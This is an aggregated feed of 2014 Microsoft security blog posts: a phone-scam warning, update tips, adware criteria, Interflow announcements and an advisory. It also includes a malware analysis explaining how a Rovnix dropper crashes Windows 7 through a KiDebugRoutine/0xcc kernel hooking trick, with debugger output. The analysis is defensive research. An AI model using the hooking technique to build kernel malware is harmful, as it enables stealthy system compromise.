<p>A reader writes:</p> <p><em>I received a call from someone who claimed that my computer had been identified by Microsoft as vulnerable. I thought it sounded fake, and I told them that I had no way to know if they were who they said they were. Then they said they could prove that they were from Microsoft by giving me my serial number if I would go to a website called www.ammyy.com.</em></p> <p><em>Is this call a scam?</em></p> <p>Yes. This is a scam. This is not a legitimate call from Microsoft. Neither Microsoft nor our partners make unsolicited phone calls (also known as cold calls) about your computer security or software fixes.</p> <h1>If you receive a call like this one, it&rsquo;s a scam, and all you need to do is hang up.</h1> <p>Cybercriminals often use publicly available phone directories, so they might know your name and other personal information when they call you. They might even guess what operating system you're using. It&rsquo;s still a scam.</p> <h1>Don&rsquo;t let scammers encourage you to install dangerous software</h1> <p>Once cybercriminals gain your trust, they might ask for your user name and password or ask you to go to a legitimate website (such as www.ammyy.com) to install software that will let them access your computer to fix it.
Once you do this, your computer and your personal information are vulnerable.</p> <p><strong>Do not trust unsolicited calls. Do not provide any personal information.</strong></p> <p>Although law enforcement can trace phone numbers, perpetrators often use pay phones, disposable cellular phones, or stolen cellular phone numbers. It's better to avoid being conned than to try to repair the damage afterwards.</p> <p>For more information, see <a href="http://www.microsoft.com/security/online-privacy/avoid-phone-scams.aspx">Avoid tech support phone scams</a>.</p> <h1>I think I might have already fallen for this scam</h1> <p>If you think you might be a victim of fraud, you can report it. For more information, see <a href="http://www.microsoft.com/security/online-privacy/phishing-scams.aspx#Victim">What to do if you think you have been a victim of a scam</a>.</p>

Antifragility – the goal for high-performance IT organizations
http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/25/antifragility-the-goal-for-high-performance-it-organizations.aspx
Wed, 25 Jun 2014 15:26:00 GMT
d5e57398-b9ef-4490-9955-07cbb4e4a80d:4c31fbfc-78c4-4990-9f6b-e319b595165c
Trusted Cloud Team
<p><strong>David Bills, Chief Reliability Strategist, Microsoft</strong></p> <p>In a <a href="/b/trustworthycomputing/archive/2014/06/18/my-desert-island-half-dozen-recommended-reading-for-resilience.aspx" target="_blank">recent post</a>, I shared a short list of my favorite books and articles related to reliability. Each one has influenced my thinking about how to go about creating a high-performing IT organization, despite the fact that not all of these publications are IT-centric in terms of subject matter. In this post, I&rsquo;m going to take a closer look at &ldquo;<a href="http://en.wikipedia.org/wiki/Antifragile:_Things_That_Gain_from_Disorder" target="_blank">Antifragile</a>&rdquo;, the 2012 book written by Nassim Nicholas Taleb, and describe why I think the concept of antifragility is particularly applicable to cloud computing. <a href="/b/trustworthycomputing/archive/2014/06/25/antifragility-the-goal-for-high-performance-it-organizations.aspx" target="_blank">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/25/antifragility-the-goal-for-high-performance-it-organizations.aspx">read more</a>)
Tags: Reliable, Cloud, Reliability, David Bills, antifragile, Cloud Computing, cloud services, antifragility

Don’t forget to update all software
http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/24/don-t-forget-to-update-all-software.aspx
Tue, 24 Jun 2014 15:27:00 GMT
91d46819-8472-40ad-a661-2c78acb4018c:10536120
Eve Blakemore
http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/24/don-t-forget-to-update-all-software.aspx#comments
<p>If you&rsquo;re signed up for automatic updating (and we hope that you are), you&rsquo;ll get all the security updates for your operating system and other Microsoft software such as Internet Explorer, Microsoft Word, Windows Defender, Microsoft Security Essentials, Microsoft Excel, and more.</p> <p><strong>Note:</strong> If you have a Windows Phone, you can <a href="http://www.windowsphone.com/en-us/how-to/wp8/basics/how-do-i-update-my-phone-software">adjust the settings to get automatic updates</a>.</p> <h1>What about non-Microsoft software?</h1> <p>To help keep your computer secure and running smoothly, you&rsquo;ll need to update not just your Microsoft software, but
all of your other software too. That includes software that came with your computer, as well as apps, programs, and other software that you downloaded yourself.</p> <p>Most software should:</p> <ul> <li>Update itself automatically, or</li> <li>Notify you when an update is available so that you can decide whether you want to install it.</li> </ul> <p>It&rsquo;s a good idea to go through all your software and look for a &ldquo;Check for updates&rdquo; option in one of the menus. For example, you can update Adobe Reader by going to <strong>Help</strong> &gt; <strong>Check for updates</strong>.</p> <p><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn more about how to get security updates automatically</a> and find out <a href="http://www.microsoft.com/security/pc-security/troubleshoot-updates.aspx">what to do if your updates don&rsquo;t install</a>.</p>
Tags: updates, automatic updating, Automatic Updates, Windows Update, third-party software

How Vulnerabilities are Exploited: the Root Causes of Exploited Remote Code Execution CVEs
http://blogs.technet.com/b/security/archive/2014/06/24/how-vulnerabilities-are-exploited-the-root-causes-of-exploited-remote-code-execution-cves.aspx
Tue, 24 Jun 2014 08:00:00 GMT
d5e57398-b9ef-4490-9955-07cbb4e4a80d:a1646e3d-9b28-4b7f-892e-f050bc1cd9fd
Tim Rains - Microsoft
http://blogs.technet.com/b/security/archive/2014/06/24/how-vulnerabilities-are-exploited-the-root-causes-of-exploited-remote-code-execution-cves.aspx#comments
<p>It is impossible to completely prevent vulnerabilities from being introduced during the development of large-scale software projects. As long as human beings write software code, mistakes that lead to imperfections in software will be made &ndash; no software is perfect. Some imperfections simply prevent the software from functioning exactly as intended, but other bugs may present vulnerabilities.</p> <p>Manual code reviews performed by developers and testers, in concert with automated tools such as fuzzers and static analysis tools, are very helpful techniques for identifying vulnerabilities in code. But these techniques cannot find every vulnerability in large-scale software projects. As developers build more functionality into their software, their code becomes more and more complex. The challenge of finding vulnerabilities in very complex code is compounded by the fact that there are an infinite number of ways that developers can make coding errors that create vulnerabilities, some of which are very, very subtle.</p> <p>Have you ever wondered what a vulnerability looks like? To illustrate how subtle a security vulnerability can be, the following small code sample contains a vulnerability that is difficult to find using code reviews, tools, or both.
<a href="/b/security/archive/2014/06/26/how-vulnerabilities-are-exploited-the-root-causes-of-exploited-remote-code-execution-cves.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/24/how-vulnerabilities-are-exploited-the-root-causes-of-exploited-remote-code-execution-cves.aspx">read more</a>)
Tags: Remote Code Execution, Vulnerabilities, Microsoft Security Intelligence Report Volume 16, RCE, Security Mitigations, SIRv16, exploits

Adware changes – One week to go
http://blogs.technet.com/b/mmpc/archive/2014/06/23/adware-changes-one-week-to-go.aspx
Mon, 23 Jun 2014 16:00:00 GMT
d5e57398-b9ef-4490-9955-07cbb4e4a80d:8067d473-1df0-4404-9933-6012af4219cd
msft-mmpc
http://blogs.technet.com/b/mmpc/archive/2014/06/23/adware-changes-one-week-to-go.aspx#comments
<p>A quick note to all developers out there. You have until 1 July to let us know if you think your software shouldn&rsquo;t be detected under our new adware criteria.</p> <p>A few months ago I announced some major changes to how we at the Microsoft Malware Protection Center assess adware in my blog <a href="http://blogs.technet.com/b/mmpc/archive/2014/04/03/adware-a-new-approach.aspx">Adware: A new approach</a>.</p> <p>As a reminder, <a href="http://www.microsoft.com/security/portal/mmpc/shared/ObjectiveCriteria.aspx">the updated criteria</a> define adware as:</p> <p><em>Programs that promote a product or service outside of their own program can interfere with your computing experience. You should have clear choice and control when installing programs that open advertisements.</em></p> <p><em>The advertisements that are opened by these programs must:</em></p> <ul> <li><em>Include an obvious way to close the ad.</em></li> <li><em>Include the name of the program that created the ad.</em></li> </ul> <p><em>The program that creates these advertisements must:</em></p> <ul> <li><em>Provide a standard uninstall method for the program using the same name as shown in the ads it produces.</em></li> </ul> <p>On 1 July 2014 we will change the way our products behave when they detect adware. The programs that we still detect, and their supporting files, will be removed by default.</p> <p>This means that you have about a week to let us know if you think your program shouldn&rsquo;t be detected.</p> <p>You can let us know through our <a href="http://www.microsoft.com/security/portal/developer/contactus.aspx">developer contact form</a>.</p> <p><em>Michael Johnson</em><br /><em>MMPC</em></p>

Microsoft Interflow: a new Security and Threat Information Exchange Platform
http://blogs.technet.com/b/security/archive/2014/06/23/microsoft-interflow-a-new-security-and-threat-information-exchange-platform.aspx
Mon, 23 Jun 2014 12:36:58 GMT
d5e57398-b9ef-4490-9955-07cbb4e4a80d:4e3592e9-37b3-4a60-a8cf-4a127a726abe
Tim Rains - Microsoft
http://blogs.technet.com/b/security/archive/2014/06/23/microsoft-interflow-a-new-security-and-threat-information-exchange-platform.aspx#comments
<p>Today, the Microsoft Security Response Center (MSRC) announced the private preview of <a href="http://www.microsoft.com/interflow">Microsoft
Interflow</a>. This is a security and threat information exchange platform for cybersecurity analysts and researchers.</p> <p>Interflow provides an automated machine-readable feed of threat and security information that can be shared across industries and community groups in near real time. The platform provides this information using the open specifications <a href="http://stix.mitre.org/">STIX&trade; (Structured Threat Information eXpression)</a>, <a href="http://taxii.mitre.org/">TAXII&trade; (Trusted Automated eXchange of Indicator Information)</a>, and <a href="http://cybox.mitre.org/">CybOX&trade; (Cyber Observable eXpression)</a>. This enables Interflow to integrate, through a plug-in architecture, with the existing operational and analytical tools that many organizations use. It has the potential to help reduce the cost of defense by automating processes that are currently performed manually.</p> <p>You can get more information on Microsoft Interflow on the <a href="/b/msrc/archive/2014/06/23/announcing-microsoft-interflow.aspx">MSRC blog</a>, as well as in this <a href="http://technet.microsoft.com/en-us/security/dn726547">FAQ</a> and at <a href="http://www.microsoft.com/interflow">www.microsoft.com/interflow</a>.</p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/23/microsoft-interflow-a-new-security-and-threat-information-exchange-platform.aspx">read more</a>)
Tags: CybOX, Microsoft Interflow, STIX, Information Exchange

Driving a Collectively Stronger Security Community with Microsoft Interflow
http://blogs.technet.com/b/msrc/archive/2014/06/23/announcing-microsoft-interflow.aspx
Mon, 23 Jun 2014 12:30:00 GMT
d5e57398-b9ef-4490-9955-07cbb4e4a80d:8357a392-32da-4cff-a6d6-cac76d55ec3e
MSRC Team
<p>Today, Microsoft is pleased to announce the private preview of <a href="http://www.microsoft.com/interflow">Microsoft
Interflow</a>, a security and threat information exchange platform for analysts and researchers working in cybersecurity. Interflow uses industry specifications to create an automated, machine-readable feed of threat and security information that can be shared across industries and groups in near real time. The goal of the platform is to help security professionals respond more quickly to threats. It will also help reduce the cost of defense by automating processes that are currently performed manually.</p> <p>Microsoft&rsquo;s ongoing active collaboration with the cybersecurity community has been a constant source of ideas and innovation for more than a decade. The Microsoft Active Protections Program (<a href="http://technet.microsoft.com/en-us/security/dn467918">MAPP</a>) was established in 2008 to provide security software providers with early access to software vulnerability information. Along the same lines, the inspiration for Interflow comes from the community. Today, data exchange difficulties &ndash; format mismatches, governance issues, and the complexity of data correlation &ndash; stand in the way of a more efficient incident response industry. Zheng Bu, VP of Security Research at FireEye, stated, &ldquo;What the cybersecurity community will benefit from is a more productive way to collaborate and take action. It is encouraging to see Microsoft invest in such a platform, and drive it forward for the greater good of the community.&rdquo;</p> <p>A collectively stronger cybersecurity ecosystem means better protection for consumers and businesses. There are many examples of alliances across industries, such as those established in the education and finance sectors. Recently, a similar <a href="http://www.rila.org/news/topnews/Pages/RetailersLaunchComprehensiveCyberIntelligenceSharingCenter.aspx">cybersecurity alliance was formed in the retail industry</a>. As retailers and others share threat indicators and take action rapidly, cyberattacks are either prevented or their damage and spread are minimized. Interflow enables exactly this type of community and peer-based sharing, whether the communities are formed by the Computer Emergency Response Teams (CERTs) across the globe or by industry.</p> <p>One may ask what exactly it means to share security and threat information using Interflow. The answer is simple: Interflow is a distributed system where users decide what communities to form, what data feeds to bring to their communities, and with whom to share data feeds. In addition, the use of the open specifications <a href="http://stix.mitre.org/">STIX&trade; (Structured Threat Information eXpression)</a>, <a href="http://taxii.mitre.org/">TAXII&trade; (Trusted Automated eXchange of Indicator Information)</a>, and <a href="http://cybox.mitre.org/">CybOX&trade; (Cyber Observable eXpression)</a> means that Interflow can integrate with existing operational and analytical tools through a plug-in architecture. This means there is no lock-in to proprietary data formats, appliances or subscriptions, all of which raise the cost of cybersecurity.</p> <p>For many operating in the response community, reducing and managing the cost of defense in the face of exponentially increasing threat data is crucial. Running on the Microsoft Azure public cloud, Interflow helps to reduce the cost of security infrastructure while allowing for rapid scale-out, a key premise of cloud computing. As Interflow automates the input and flow of security and threat data, organizations are able to prioritize analysis and action through customized watch lists, instead of bearing the cost of manual data compilation.</p> <p>As early users of Interflow, various network security teams at Microsoft have experienced these kinds of benefits.
Microsoft is planning to share the security and threat data used to protect our own products and services with the Interflow communities during the private preview. Organizations and enterprises with dedicated security incident response teams can inquire about the private preview through their Technical Account Managers or by emailing <a href="mailto:mappbeta@microsoft.com">mappbeta@microsoft.com</a>. Microsoft plans to make Interflow available to all members of MAPP in the future.</p> <p>I said in the beginning that the cybersecurity community was the inspiration for Interflow. We look forward to working with the community to shape the roadmap forward. Today&rsquo;s announcement is timed with the 26<sup>th</sup> annual <a href="http://www.first.org/conference/2014">FIRST Conference</a> in Boston, Massachusetts. Attendees at the conference can stop by the Microsoft booth #8, observe a demo and discuss participation in the private preview of Interflow.</p> <p>Finally, you can find answers to the most commonly asked questions <a href="http://technet.microsoft.com/en-us/security/dn727293">here</a>, and learn how Interflow enables a collectively stronger cybersecurity community at <a href="http://www.microsoft.com/interflow">www.microsoft.com/interflow</a>.</p> <p>Thanks,</p> <p>Jerry Bryant<br /> Lead Senior Security Strategist, Microsoft Security Response Center (MSRC)</p>
Tags: Interflow, Announcements

Do you know what your children are doing online?
http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/20/safer-families.aspx
Fri, 20 Jun 2014 17:44:00 GMT
91d46819-8472-40ad-a661-2c78acb4018c:10536113
Kim Sanchez, Director of Trustworthy Computing
http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/20/safer-families.aspx#comments
<p>This week in the UK, Microsoft launches the <a href="http://www.microsoft.com/en-gb/about/family-safety/safer-families">Safer Families program</a> for parents to help their kids stay safer online.</p> <p>According to recent Microsoft research*:</p> <ul> <li>98 percent of UK parents with children at home agree that protecting their children online is necessary, yet almost 50 percent have not used the family safety settings or functions on the devices their children use.</li> <li>Of these, 50 percent don&rsquo;t know how to do so, and 50 percent know how, but just haven&rsquo;t done it yet.</li> </ul> <p>*The survey interviewed 1000 parents in the UK with children at home aged 5-16 years.</p> <p>So what can parents do?</p> <p>Microsoft makes it easy by providing <a href="http://www.microsoft.com/security/family-safety/settings.aspx">parental controls</a> that are built into its products and services.
The new Safer Families program is designed to help parents remove the feeling of &rdquo;parental tech paralysis&rdquo; and switch on safety settings on your Microsoft technology and devices at home.</p> <p>Learn more about the <a href="http://www.microsoft.com/en-gb/about/family-safety/safer-families">Safer Families</a> program and how to turn on parental controls on your Microsoft devices.</p> <p><iframe src="http://www.youtube.com/embed/1EVNJnbrtOc" frameborder="0" width="640" height="390"></iframe></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10536113" width="1" height="1">parental controlschild safetyfamilycybersafetycyberbullyingMicrosoftXboxSafer FamiliesMicrosoft UK Security, compliance help fuel Los Angeles County’s O365 migration http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/19/security-compliance-help-fuel-los-angeles-county-s-o365-migration.aspxThu, 19 Jun 2014 16:05:26 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a8740e99-a043-466b-8c65-2443f7475b8eTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong><br /><br />At Microsoft, we often talk about the investments we&rsquo;ve made in trustworthy cloud services. 
But there&rsquo;s nothing more encouraging than hearing from customers who recognize and benefit from those investments.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/06/19/security-compliance-help-fuel-los-angeles-county-s-o365-migration.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/19/security-compliance-help-fuel-los-angeles-county-s-o365-migration.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633171&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">cloud securityCustomersAdrienne HallCloudOffice 365Trustcustomer perspectiveTechnologySecurityCloud Computingcloud servicesMicrosoftDataPrivacyMicrosoft Cloud Solutions New Product Allows People to Manage a Wheelchair and Other Devices with One Controllerhttp://blogs.msdn.com/b/accessibility/archive/2014/06/19/new-product-allows-people-to-manage-a-wheelchair-and-other-devices-with-one-controller.aspxThu, 19 Jun 2014 15:12:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10534182Daniel Hubbell - MSFT2http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10534182http://blogs.msdn.com/b/accessibility/archive/2014/06/19/new-product-allows-people-to-manage-a-wheelchair-and-other-devices-with-one-controller.aspx#commentsPeople in electric wheelchairs can now make calls, text and generally use many Bluetooth-enabled devices through one wheelchair controller, Medgadget reports . 
With the interface, someone could use a device that drives a wheelchair to control a range...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/19/new-product-allows-people-to-manage-a-wheelchair-and-other-devices-with-one-controller.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10534182" width="1" height="1"> My “Desert Island Half-Dozen” – recommended reading for resiliencehttp://blogs.technet.com/b/trustworthycomputing/archive/2014/06/18/my-desert-island-half-dozen-recommended-reading-for-resilience.aspxWed, 18 Jun 2014 20:49:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:a5922a1b-dd11-4180-be43-ff88eb75a937Trusted Cloud Team0<p><strong>By David Bills, chief reliability strategist, Microsoft</strong></p> <p>When I speak with customers, they often ask how they can successfully change the culture of their IT organization when deciding to implement a resilience engineering practice. Over the past decade I&rsquo;ve collected a number of books and articles which I have found to be helpful in this regard, and I often recommend these resources to customers. 
I&rsquo;ve included my favorites below, in no particular order, with a short explanation of why I&rsquo;m recommending them.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/06/18/my-desert-island-half-dozen-recommended-reading-for-resilience.aspx">See more&gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/06/18/my-desert-island-half-dozen-recommended-reading-for-resilience.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633117&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">practicesCustomersCloudReliabilityCIOstrusted online experiencesBig Dataprivacy and reliabilitycustomer perspectiveITTechnologyExpert OpinionsProcessesCloud Computingdata centerscloud servicesTrustworthy ComputingMicrosoftInformation SecurityMicrosoft Cloud SolutionsIT Pros “Your fault - core dumped”- Diving into the BSOD caused by Rovnixhttp://blogs.technet.com/b/mmpc/archive/2014/06/18/your-fault-core-dumped-diving-into-the-bsod-caused-by-rovnix.aspxWed, 18 Jun 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:b8408e31-1911-4fc3-8cc1-525289d809f3msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/06/18/your-fault-core-dumped-diving-into-the-bsod-caused-by-rovnix.aspx#comments<div class="ExternalClass68292F33AA254F5BA400EB352B71C492"> <p>Recently we have noticed some <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/search.aspx?query=Rovnix">Win32/Rovnix</a> samples (detected as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDropper:Win32/Rovnix.K">TrojanDropper:Win32/Rovnix.K</a>) causing the BSOD on Windows 7 machines. We spent some time investigating this situation and discovered an interesting story behind the BSOD.</p> <p><strong>Analyzing the crash dump</strong></p> <p>We first saw TrojanDropper:Win32/Rovnix.K in October 2013. 
During a normal Windows boot the malware causes the BSOD.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/BSOD1.png"><img width="500" alt="The BSOD" src="http://www.microsoft.com/security/portal/blog-images/a/BSOD1.png" border="0" /></a></p> <p><em>Figure 1: Rovnix BSOD screenshot</em></p> <p>To start, let&rsquo;s analyze the crash dump using windbg:</p> <pre>kd&gt; !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

ATTEMPTED_WRITE_TO_READONLY_MEMORY (be)
An attempt was made to write to read only memory.  The guilty driver is on the
stack trace (and is typically the current instruction pointer).
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: 867bf4b1, Virtual address for the attempted write.
Arg2: 02f72121, PTE contents.
Arg3: 8a733c44, (reserved)
Arg4: 0000000b, (reserved)</pre> <p>As shown above, the BSOD is caused by a write to a read-only memory address (0x867bf4b1).</p> <p>We can then use the .trap command to get further information.</p> <pre>kd&gt; .trap 0xffffffff8a733c44
ErrCode = 00000003
eax=00000000 ebx=00000000 ecx=867bf4b1 edx=80ba6848 esi=80ba5a2e edi=80ba6876
eip=80b9be24 esp=8a733cb8 ebp=8a733cd4 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00210246
80b9be24 c601cc          mov     byte ptr [ecx],0CCh        ds:0023:867bf4b1=8b</pre> <p>According to the above information, the BSOD is raised when Rovnix tries to write to address 0x867bf4b1 (ecx).</p> <p>Let&rsquo;s have a look at that address:</p> <pre>kd&gt; u 867bf4b1
storport!RaDriverScsiIrp
867bf4b1 8bff            mov     edi,edi
867bf4b3 55              push    ebp
867bf4b4 8bec            mov     ebp,esp
867bf4b6 53              push    ebx
867bf4b7 56              push    esi
867bf4b8 57              push    edi
867bf4b9 a100d07c86      mov     eax,dword ptr [storport!WPP_GLOBAL_Control (867cd000)]
867bf4be 8b7d0c          mov     edi,dword ptr [ebp+0Ch]</pre> <p>We know Rovnix is trying to write the byte <em>0xcc</em> at address <em>storport!RaDriverScsiIrp</em>. However, it didn&rsquo;t make the address writable, so the write to read-only memory causes a BSOD.</p> <p><strong>The trick behind this BSOD</strong></p> <p>Why is Rovnix trying to put a <em>0xcc</em> byte at a driver dispatch function? Isn&rsquo;t that going to cause an exception? We recall having seen this trick before (used by <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Alureon">Win32/Alureon</a>) &ndash; it&rsquo;s a tricky hooking mechanism. In short, it works like this:</p> <ol> <li>The malware modifies KiDebugRoutine to point to its own debug routine.</li> <li>When the 0xcc is executed, an exception is raised, and control is transferred to Rovnix&rsquo;s own debug routine.</li> <li>In Rovnix&rsquo;s own debug routine, it modifies the EIP register in the saved context to point to its own function (the hook).</li> </ol> <p>Is that the end of the story? No, not yet.</p> <p><strong>Windows XP vs. Windows 7</strong></p> <p>Did the malware author test the sample before releasing it? Probably yes, but perhaps only on Windows XP. We tried this sample on a Windows XP machine, and it doesn&rsquo;t crash - the <em>KiDebugRoutine</em> trick works as expected. This means that on Windows XP, the memory address must be writable. However, the section characteristics are read-only in both cases. So why is the address writable on Windows XP but not on Windows 7?</p> <p>The answer is a bit surprising &ndash; it lies in the value of SectionAlignment in the PE header. On Windows XP, the <em>SectionAlignment</em> for the disk driver is less than <em>0x1000</em>, whereas on Windows 7 it is <em>0x1000</em>. For the <em>SectionAlignment &lt; 0x1000</em> case, Windows loads the whole PE file as a single subsection, and the whole subsection is writable regardless of the section characteristics in the section table. For the <em>SectionAlignment &gt;= 0x1000</em> case, the image is loaded section by section and each section has its own characteristics (specified in the section table).</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/BSOD2.png"><img width="500" alt="Win XP" src="http://www.microsoft.com/security/portal/blog-images/a/BSOD2.png" border="0" /></a></p> <p><em>Figure 2: SectionAlignment &lt; 0x1000 on Windows XP</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/BSOD3.png"><img alt="Win 7" src="http://www.microsoft.com/security/portal/blog-images/a/BSOD3.png" border="0" /></a></p> <p><em>Figure 3: SectionAlignment = 0x1000 on Windows 7</em></p> <p>That&rsquo;s the whole story of this BSOD &ndash; &ldquo;Rovnix&rsquo;s fault - so core dumped&rdquo;.</p> <p>Our <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDropper:Win32/Rovnix.K">TrojanDropper:Win32/Rovnix.K</a> description has full remediation steps to fix this issue.</p> <p>As always, the best protection from this and other threats is to run up-to-date real-time security software such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a> and the <a href="http://www.microsoft.com/en-us/download/details.aspx?id=29851">Enhanced Mitigation Experience Toolkit</a>.</p> <p><em>Chun Feng and Jim Wang</em></p> </div>
<p><strong><a href="http://blogs.technet.com/b/security/archive/2014/06/17/when-vulnerabilities-are-exploited-the-timing-of-first-known-exploits-for-remote-code-execution-vulnerabilities.aspx">When Vulnerabilities are Exploited: the Timing of First Known Exploits for Remote Code Execution Vulnerabilities</a></strong><br />Tue, 17 Jun 2014 17:02:18 GMT, by Tim Rains - Microsoft</p> <p>One of the questions I get asked from time to time is about the days of risk between the time that a vulnerability is disclosed and when we first see active exploitation of it; i.e. how long do organizations have to deploy the update before active attacks begin? Trustworthy Computing&rsquo;s <a href="http://www.microsoft.com/security/msec.aspx">Security Science</a> team published new data that helps put the timing of exploitation into perspective, in the recently released <a href="http://www.microsoft.com/sir">Microsoft Security Intelligence Report volume 16</a>.</p> <p>The Security Science team studied exploits that emerged for the most severe vulnerabilities in Microsoft software between 2006 and 2013. The exploits studied were for vulnerabilities that enable remote code execution.
The timing of the release of the first known exploit for each remote code execution vulnerability was examined and the results were put into three groups. <a href="/b/security/archive/2014/06/16/when-vulnerabilities-are-exploited-the-timing-of-first-known-exploits-for-remote-code-execution-vulnerabilities.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/06/17/when-vulnerabilities-are-exploited-the-timing-of-first-known-exploits-for-remote-code-execution-vulnerabilities.aspx">read more</a>)
<p><strong><a href="http://blogs.technet.com/b/msrc/archive/2014/06/17/microsoft-releases-security-advisory-2974294.aspx">Microsoft releases Security Advisory 2974294</a></strong><br />Tue, 17 Jun 2014 17:00:00 GMT, by Dustin C. Childs</p> <p>Today, we released <a href="https://technet.microsoft.com/library/security/2974294">Security Advisory 2974294</a> to inform global customers about an update for the Microsoft Malware Protection Engine. This update addresses a privately disclosed issue and fixes a vulnerability that could allow a denial of service if the Microsoft Malware Protection Engine scans a specially crafted file.</p> <p>Updates for the Microsoft Malware Protection Engine are sent through security advisories as there is typically no action required to install the update: the built-in mechanism for the automatic detection and deployment of updates will apply the update within 48 hours of release. There&rsquo;s no action for you to take here &ndash; the engine will do it for you. The exact time frame depends on the software used, Internet connection, and infrastructure configuration.</p> <p>We appreciate the researcher reporting this to us privately via Coordinated Vulnerability Disclosure (CVD) and allowing us to release the update before there was any impact to our global customers.</p> <p>Thank you,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Trustworthy Computing</p>
<p><strong><a href="http://blogs.msdn.com/b/securitytipstalk/archive/2014/06/17/get-help-with-your-outlook-questions.aspx">Get help with your Outlook.com questions</a></strong><br />Tue, 17 Jun 2014 14:44:00 GMT, by Eve Blakemore</p> <p>We receive lots of comments and questions from people who are having trouble signing in to their accounts. Although we can&rsquo;t answer all of your questions individually, you might find solutions on the following pages.</p> <p><strong>Click the problem you need help with:</strong></p> <ul> <li><a href="http://windows.microsoft.com/en-us/windows-live/sign-in-cant">Forgotten password and other sign-in problems</a></li> <li><a href="http://go.microsoft.com/fwlink/?LinkID=242804">I need to reset my password</a></li> <li><a href="http://go.microsoft.com/fwlink/?LinkID=320400">&ldquo;Your account has been temporarily blocked&rdquo;</a></li> <li><a href="http://windows.microsoft.com/en-us/windows-live/sign-in-how">How do I sign in to my Microsoft account?</a></li> <li><a href="http://go.microsoft.com/fwlink/?LinkID=294733">I am having problems receiving or using a security or verification code</a></li> <li><a href="http://windows.microsoft.com/en-us/windows-live/account-security-password-information">Why am I being asked to provide or verify my security info?</a></li> <li><a href="http://go.microsoft.com/fwlink/?LinkID=294734">My problem isn't listed here</a></li> </ul> <p>Need help with something else? <a href="http://windows.microsoft.com/en-us/windows-live/microsoft-account-help">See the top Microsoft account solutions</a></p>
<p><strong><a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/17/nokia-unveils-a-new-pocket-magnifier-and-accessibility-tool-for-lumia-smartphones.aspx">Nokia Unveils a New Pocket Magnifier and Accessibility Tool for Lumia Smartphones</a></strong><br />Tue, 17 Jun 2014 13:30:00 GMT, by Daniel Hubbell - MSFT</p> <p>Nokia teamed up with the Royal National Institute of Blind People (RNIB) to create a magnifier for its Lumia smartphones that could be a helpful tool for vision-impaired users. The Nokia Pocket Magnifier allows a user to turn a Lumia phone into a magnifying...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/06/17/nokia-unveils-a-new-pocket-magnifier-and-accessibility-tool-for-lumia-smartphones.aspx">read more</a>)</p>
<p><strong><a href="http://blogs.technet.com/b/msrc/archive/2014/06/13/june-2014-security-bulletin-webcast-and-q-amp-a.aspx">June 2014 Security Bulletin Webcast and Q&amp;A</a></strong><br />Fri, 13 Jun 2014 17:00:00 GMT, by Dustin C. Childs</p> <p>Today we published the June 2014 Security Bulletin webcast <a href="http://blogs.technet.com/b/msrc/p/july-2014-security-bulletin-q-a.aspx">questions and answers page</a> along with the webcast replay.
